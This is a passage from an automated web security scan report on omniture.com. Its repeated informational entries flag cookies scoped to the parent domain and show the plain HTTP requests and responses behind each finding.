GET /en/education/courses/sitesearch HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:08:13 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:08:13 GMT
Content-Length: 27900
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:13 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>SiteSearch Training Courses | W
...[SNIP]...

11.381. http://www.omniture.com/en/education/courses/survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/survey

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/survey HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:08:44 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:08:44 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:08:45 GMT
Content-Length: 27617
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:44 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Survey Training Courses | Web A
...[SNIP]...

11.382. http://www.omniture.com/en/education/courses/testandtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/testandtarget

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:06:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/education/courses/testandtarget HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

11.383. http://www.omniture.com/en/partners previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/partners HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:42 GMT
Content-Length: 21370
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:42 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Partner Program Overvi
...[SNIP]...

11.384. http://www.omniture.com/en/partners/apply previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/apply

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:16:07 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/partners/apply HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:16:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Wed, 02 Feb 2011 19:16:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:16:07 GMT; path=/; domain=omniture.com
Content-Length: 33367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Become a Partner | Online Busin
...[SNIP]...

11.385. http://www.omniture.com/en/partners/portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/portal

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:54 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/partners/portal HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:54 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:54 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:54 GMT
Content-Length: 21832
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:54 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Partner Portal Login |
...[SNIP]...

11.386. http://www.omniture.com/en/partners/showcase previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/partners/showcase

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:49 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/partners/showcase HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:49 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:49 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:49 GMT
Content-Length: 29397
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:49 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Partner Showcase | Onl
...[SNIP]...

11.387. http://www.omniture.com/en/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:43:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/privacy HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:43:36 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:43:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:43:36 GMT
Content-Length: 23114
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:43:36 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...

11.388. http://www.omniture.com/en/privacy/2o7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/2o7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

omniture_unique=c4b47f0affb47cea2cd263f6285f016c; path=/; domain=omniture.com
imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 15:39:24 GMT; path=/; domain=omniture.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/privacy/2o7?f=2o7 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_omniture=84542986.5892.0000

Response

11.389. http://www.omniture.com/en/privacy/policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/policy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/privacy/policy HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:16 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:16 GMT; path=/; domain=omniture.com
Content-Length: 43642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Privacy Center: Privac
...[SNIP]...

11.390. http://www.omniture.com/en/privacy/product previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/product

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/privacy/product HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:18 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:18 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:58:19 GMT
Content-Length: 31979
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:18 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture Product Privacy Policy
...[SNIP]...

11.391. http://www.omniture.com/en/privacy/visualsciences previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/privacy/visualsciences HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:18 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:18 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:58:18 GMT
Content-Length: 21092
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:18 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Company | Visual Sci
...[SNIP]...

11.392. http://www.omniture.com/en/privacy/visualsciences/policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/policy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/privacy/visualsciences/policy HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:20 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:20 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:58:20 GMT
Content-Length: 27266
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:20 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Company | Visual Sci
...[SNIP]...

11.393. http://www.omniture.com/en/privacy/visualsciences/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/resources

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:25 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/privacy/visualsciences/resources HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 18:58:25 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 18:58:25 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 18:58:25 GMT
Content-Length: 25972
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:25 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Omniture | Company | Visual Sci
...[SNIP]...

11.394. http://www.omniture.com/en/privacy/visualsciences/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/terms

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:28 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/privacy/visualsciences/terms HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

11.395. http://www.omniture.com/en/product_tours/form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/product_tours/form

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

